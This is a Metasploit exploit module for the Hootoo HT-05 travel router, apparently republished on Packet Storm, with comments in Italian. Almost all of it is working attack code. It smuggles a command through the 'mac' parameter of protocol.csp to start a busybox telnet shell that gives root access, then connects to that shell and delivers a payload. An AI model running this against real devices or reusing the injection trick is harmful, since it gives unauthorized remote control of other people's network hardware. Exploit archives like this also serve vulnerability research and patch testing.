This Metasploit module is a Hootoo HT-05 remote code execution exploit.
22c2265e1d258b903429a80d33d4ddcd0157b2c98ef785ad670ab2cd79e079e3require 'msf/core'
require 'net/http'
require "uri"
class MetasploitModule < Msf::Exploit::Remote
include Msf::Exploit::Remote::Tcp
#
#Descrizione del Exploit
#
def initialize(info = {})
super(update_info(info,
'Name' => 'Hootoo HT-05 remote shell exploit',
'Description' => %q{
This module tries to open a door in the device by exploiting the RemoteCodeExecution by creating a backdoor inside the device
This exploit was written by Andrei Manole. Version of the frimware 2.000.022. Tested on 2.00.0.82 -> it still works
},
'Author' => 'Andrei Manole',
'References' =>
[
],
'Privileged' => true,
'Platform' => [ 'unix' ],
'Arch' => ARCH_CMD,
'Payload' =>
{
'Space' => 2000,
'BadChars' => '',
'DisableNops' => true,
'Compat' =>
{
'PayloadType' => 'cmd_interact',
'ConnectionType' => 'find'
}
}, #fine del settaggio del payload
'Targets' =>
[
[ 'Automatic', { } ],
],
'DisclosureDate' => "20 Dicembre 2018",
'DefaultTarget' => 0))
register_options([ Opt::RPORT(6666) ], self.class)
end
def send_request(host,port) #funzione di invio
uri = URI.parse("http://#{host}/protocol.csp?function=set&fname=security&opt=mac_table&flag=close_forever&mac=|/bin/busybox%20telnetd%20-l/bin/sh%20-p#{port}")
http = Net::HTTP.new(uri.host, uri.port)
request = Net::HTTP::Get.new(uri.request_uri)
response = http.request(request)
if response.code == 200 || response.message == 'OK' || response.class.name == 'HTTPOK' then
return true
end
return false
end
def exploit #exploit
print_status("[+] Apertura backdoor in corso...")
if !send_request(datastore['RHOST'],datastore['RPORT']) then #controllo della funzione di invio , passando i dati scelti dal utenti mediante il datastore[] di msf.
raise("[-] Errore nel apertura della porta")
end
print_good("[+] Richiesta inviata con successo! :)")
nsock = self.connect(false, {"RPORT" => datastore['RPORT']}) rescue nil #inizio a fare la conessione
print_good("[+] Porta aperta con successo ! :)")
nsock.put(payload.encoded + " >/dev/null 2>&1") #passo il payload per creare una communicazione con la /bin/sh create sulla porta, ">/dev/null 2>&1" invio Stand Error in un backhole e dopo su 1 -> Standard Out.
handler(nsock)
return
end
end
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed